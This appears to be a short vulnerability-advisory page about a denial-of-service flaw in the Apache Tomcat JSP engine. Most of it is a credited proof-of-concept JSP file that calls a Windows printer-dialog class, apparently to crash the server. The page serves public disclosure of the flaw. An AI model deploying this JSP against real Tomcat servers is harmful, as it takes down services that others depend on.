Apache Tomcat JSP Engine Denial of Service Vulnerability

info
discussion
exploit
solution
references

Apache Tomcat JSP Engine Denial of Service Vulnerability

The following proof of concept was provided by Marc Schoenefeld <marc.schoenefeld@uni-muenster.de>:

<%@ page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
%>
<%@ page import="sun.awt.windows.*" %>
<%! %>
<%
//
%>
<html>
<head>
<title>aa</title>
</head>
<body>

<p>
<FONT SIZE="+2">dON/T TR1 thiz @ home</font>
</p>
<%
new WPrinterJob().pageSetup(null,null);
%>

</body>
</html>